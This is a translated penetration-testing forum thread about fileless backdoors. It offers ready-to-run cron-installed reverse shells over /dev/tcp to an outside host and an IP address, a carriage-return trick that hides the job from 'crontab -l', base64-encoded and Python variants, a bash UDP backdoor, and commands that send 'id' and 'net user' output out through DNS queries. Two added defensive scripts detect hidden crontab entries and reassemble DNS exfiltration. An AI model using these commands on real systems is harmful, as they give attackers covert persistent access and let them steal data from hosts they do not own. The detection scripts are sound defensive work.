WooYun (white-hat technical community) >> Penetration Testing >> A one-command, fileless, highly compatible reverse-connect backdoor
Best executed as an uncommon user; the job is written to /var/spool/cron/$username:
(crontab -l;echo '*/60 * * * * exec 9<> /dev/tcp/dns.wuyun.org/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i')|crontab -
Upgraded sneaky version: crontab -l simply reports "no crontab for $username":
(crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/dns.wuyun.org/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -
It calls back once every 60 minutes. When the callback job fires while nothing is listening, it leaves neither a process nor a port behind:
-bash: connect: Connection refused
-bash: /dev/tcp/dns.wuyun.org/53: Connection refused
-bash: 9: Bad file descriptor
-bash: 9: Bad file descriptor
In other words, once installed it is very hard to discover unless the connection actually succeeds.
-
bash UDP reverse backdoor:
#!/bin/bash
exec 9<> /dev/udp/localhost/8080
[ $? -eq 1 ] && exit
echo "connect ok" >&9
while :
do
    a=`dd bs=200 count=1 <&9 2>/dev/null`
    if echo "$a"|grep "exit"; then break; fi
    echo `$a` >&9
done
exec 9>&-
exec 9<&-
https://github.com/cloudsec/brootkit/blob/master/ubd.sh
-
@猪猪侠 I really did learn something from this hidden version; Orange from Taiwan is awesome.
-
exec 9<> /dev/tcp/localhost/8080&&exec 0<&9&&exec 1>&9 2>&1&&/bin/bash --noprofile -i
This way, if the TCP connection fails, bash is not executed; otherwise the system gains one more /bin/bash -i process every hour.
The reverse-connect payload can also be base64-encoded and decoded at run time:
*/1 * * * * a=`echo "ZXhlYyA5PD4gL2Rldi90Y3AvbG9jYWxob3N0LzgwODA7ZXhlYyAwPCY5O2V4ZWMgMT4mOSAyPiYxOy9iaW4vYmFzaCAtLW5vcHJvZmlsZSAtaQ=="|base64 -d`;/bin/bash -c "$a";unset a
For more bash penetration tricks, see: https://github.com/cloudsec/brootkit
-
Orange just taught another trick:
printf "*/3 * * * * $CMD;\rno crontab for $USER%$((${#CMD}+10))c\n" | crontab -
-
// Python version, tested on Kali, TCP 8080:
(crontab -l;printf "*/5 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.153\",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);';\rno crontab for `whoami`%100c\n")|crontab -
-
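The hiding trick in the posts above only fools `crontab -l` on a terminal: the \r makes the terminal overwrite the real entry with the padded "no crontab for ..." text, while the spool file still holds the whole job and cron still runs it. Below is an added defensive audit script (not code from the thread or from brootkit) that reads spool files byte for byte, reports every carriage return, and flags the indicators discussed in this thread: /dev/tcp or /dev/udp redirection, fd-juggling with exec, interactive bash, base64-decoded payloads, and the python socket+dup2 variant. The sample crontab text, the host c2.example.invalid and the address 10.0.0.1 in it are constructed for the example.

```python
"""Audit crontab spool files for entries hidden from `crontab -l`.

Added defensive example, not code from the thread. `crontab -l` writes the
spool file to the terminal, so a carriage return (\r) inside an entry makes
the terminal overwrite the real job with whatever follows it, such as a
padded "no crontab for user". The spool file still holds the full entry, so
reading it byte for byte and reporting every \r defeats the trick.
"""
import base64
import binascii
import os
import re
from typing import Dict, Iterable, List

# Indicators taken from the techniques shown in the thread.
SUSPICIOUS_PATTERNS = {
    "bash_dev_socket": re.compile(r"/dev/(tcp|udp)/"),
    "fd_redirect_trick": re.compile(r"exec\s+\d+<>"),
    "interactive_shell": re.compile(r"/bin/(ba)?sh\s+(--noprofile\s+)?-i\b"),
    "base64_decode": re.compile(r"base64\s+(-d|--decode)\b"),
    "python_socket_dup2": re.compile(r"socket\.socket\(.*dup2"),
}
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_base64_payloads(entry: str) -> List[str]:
    """Decode base64 tokens on an entry that pipes into base64 -d; keep printable results."""
    if not SUSPICIOUS_PATTERNS["base64_decode"].search(entry):
        return []
    decoded = []
    for token in B64_TOKEN.findall(entry):
        if len(token) % 4:
            continue
        try:
            text = base64.b64decode(token, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if text.isprintable():
            decoded.append(text)
    return decoded


def audit_crontab(spool_text: str) -> List[Dict]:
    """Return one finding per suspicious entry, including the text a terminal would show."""
    findings = []
    for lineno, raw in enumerate(spool_text.split("\n"), 1):
        if not raw.strip() or raw.lstrip().startswith("#"):
            continue
        indicators = []
        if "\r" in raw:
            indicators.append("carriage_return_hiding")
        for name, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(raw):
                indicators.append(name)
        for text in decode_base64_payloads(raw):
            for name, pattern in SUSPICIOUS_PATTERNS.items():
                if pattern.search(text) and "decoded:" + name not in indicators:
                    indicators.append("decoded:" + name)
        if indicators:
            # A terminal shows only what follows the last \r; cron runs the whole line.
            visible = raw.rsplit("\r", 1)[-1].rstrip()
            findings.append({"line": lineno, "indicators": indicators,
                             "visible": visible, "raw": raw})
    return findings


def audit_spool_dirs(dirs: Iterable[str]) -> Dict[str, List[Dict]]:
    """Audit every file in the given directories (e.g. /var/spool/cron, /etc/cron.d)."""
    results = {}
    for base in dirs:
        if not os.path.isdir(base):
            continue
        for name in sorted(os.listdir(base)):
            path = os.path.join(base, name)
            if not os.path.isfile(path):
                continue
            # newline="" keeps \r as-is; default text mode would translate it and hide the trick.
            with open(path, encoding="utf-8", errors="replace", newline="") as fh:
                found = audit_crontab(fh.read())
            if found:
                results[path] = found
    return results


# Constructed sample spool content modelled on the entries in this thread; the host
# c2.example.invalid and the address 10.0.0.1 are placeholders, not real infrastructure.
SAMPLE_CRONTAB = "\n".join([
    "0 3 * * * /usr/local/bin/backup.sh",
    "*/60 * * * * exec 9<> /dev/tcp/c2.example.invalid/53;exec 0<&9;exec 1>&9 2>&1;"
    "/bin/bash --noprofile -i;\rno crontab for www-data" + " " * 40,
    "*/1 * * * * a=`echo \"ZXhlYyA5PD4gL2Rldi90Y3AvbG9jYWxob3N0LzgwODA7ZXhlYyAwPCY5O2V4ZWMg"
    "MT4mOSAyPiYxOy9iaW4vYmFzaCAtLW5vcHJvZmlsZSAtaQ==\"|base64 -d`;/bin/bash -c \"$a\";unset a",
    "*/5 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,"
    "socket.SOCK_STREAM);s.connect((\"10.0.0.1\",8080));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);"
    "os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'",
])

if __name__ == "__main__":
    for finding in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {finding['line']}: {finding['indicators']}")
        print(f"  terminal shows: {finding['visible']!r}")
        print(f"  cron runs:      {finding['raw']!r}")
    real = audit_spool_dirs(["/var/spool/cron", "/var/spool/cron/crontabs", "/etc/cron.d"])
    for path, found in real.items():
        print(path, [f["indicators"] for f in found])
```

The same result can be had from the shell with `cat -A /var/spool/cron/*`, which prints the carriage return as `^M`; the point of the script is that it inspects the file rather than the terminal rendering, and that it decodes base64 stages before matching, so the encoded variant from the earlier post is flagged on the same indicators as the plain one.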
net user | nslookup type=A 144.144.144.144
net user > \\ip\c$\xxx.txt
http://www.freebuf.com/articles/system/57183.html
http://paper.aliapp.com/md/dns.txt
LINE=`id`; domain="yourdomain.com"
while read -r -n 1 char; do var+=$(printf "%X" \'$char\'); done <<<$LINE
b=0; e=60; l=${#var}
while [ $b -lt $l ]; do
    >& /dev/udp/$RANDOM.$b."${var:$b:$e}".$domain/53 0>&1
    let b=b+60
done
>& /dev/udp/$RANDOM.theend.$domain/53 0>&1
unset var; unset var2
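As an added defensive counterpart to the DNS one-liner above (not code from the thread or the linked paper): the query names it produces have a fixed shape, a random label, a numeric offset, an uppercase-hex chunk, the domain, and a closing "theend" marker, so a resolver or sensor log contains every chunk in clear and the data can be reassembled for triage. The BIND-style log format, the source addresses and the domain exfil.example.invalid are assumptions made for the sample; the sample log lines are constructed and carry the hex encoding of "uid=33(www-data) gid=33(www-data)" split at offset 60 exactly as the script would split it.

```python
"""Reassemble hex-in-label DNS exfiltration from resolver query logs.

Added defensive example, not code from the thread. The one-liner above emits
queries shaped "<random>.<offset>.<hexchunk>.<domain>" followed by
"<random>.theend.<domain>"; a resolver log therefore contains every chunk
in clear. The BIND-style log format, the addresses and the domain
exfil.example.invalid used here are assumptions made for the sample.
"""
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

QUERY_LINE = re.compile(r"client (?P<src>[\d.]+)#\d+: query: (?P<qname>\S+) IN")
HEX_LABEL = re.compile(r"^[0-9A-Fa-f]+$")


def parse_chunk(qname: str, domain: str) -> Optional[Tuple[int, str]]:
    """Return (offset, hexchunk) for a "<rand>.<offset>.<hex>.<domain>" name, else None."""
    suffix = "." + domain.lower()
    if not qname.lower().endswith(suffix):
        return None
    labels = qname[:-len(suffix)].split(".")
    if len(labels) != 3 or not labels[1].isdigit() or not HEX_LABEL.match(labels[2]):
        return None
    return int(labels[1]), labels[2]


def detect_exfil(log_lines: List[str], domain: str) -> Dict[str, Dict]:
    """Group chunk queries per source host, reassemble the hex stream and decode it."""
    per_source = defaultdict(lambda: {"chunks": {}, "ended": False})
    for line in log_lines:
        match = QUERY_LINE.search(line)
        if not match:
            continue
        src, qname = match.group("src"), match.group("qname")
        chunk = parse_chunk(qname, domain)
        if chunk:
            offset, hexdata = chunk
            per_source[src]["chunks"][offset] = hexdata
        elif qname.lower().endswith(".theend." + domain.lower()):
            per_source[src]["ended"] = True
    report = {}
    for src, state in per_source.items():
        chunks = state["chunks"]
        # The offset label orders the chunks regardless of arrival order or caching.
        hexstream = "".join(chunks[offset] for offset in sorted(chunks))
        try:
            data = bytes.fromhex(hexstream).decode("ascii", errors="replace")
        except ValueError:  # odd length or non-hex: keep the raw stream for analysis
            data = None
        longest = max((len(c) for c in chunks.values()), default=0)
        report[src] = {
            "queries": len(chunks),
            "ended": state["ended"],
            # Long hex labels plus an end marker is the shape the one-liner produces.
            "likely_exfil": longest >= 32 or state["ended"],
            "data": data,
            "hex": hexstream,
        }
    return report


SAMPLE_DOMAIN = "exfil.example.invalid"
# Constructed resolver log: 10.0.0.23 carries the hex of "uid=33(www-data) gid=33(www-data)"
# in two chunks (offsets 0 and 60) followed by the end marker; 10.0.0.9 is benign noise.
SAMPLE_LOG = [
    "client 10.0.0.23#4242: query: 18241.0."
    "7569643D3333287777772D6461746129206769643D3333287777772D6461.exfil.example.invalid IN A",
    "client 10.0.0.9#5353: query: www.example.invalid IN A",
    "client 10.0.0.23#4242: query: 2731.60.746129.exfil.example.invalid IN A",
    "client 10.0.0.23#4242: query: 9912.theend.exfil.example.invalid IN A",
]

if __name__ == "__main__":
    for src, info in detect_exfil(SAMPLE_LOG, SAMPLE_DOMAIN).items():
        print(src, info)
```

The domain argument is the one under investigation; in practice the candidate surfaces first as a burst of unique, never-repeating subdomains toward a single zone, which is also why the script prefixes every query with $RANDOM. The reassembly step is what turns that alert into evidence of what actually left the host.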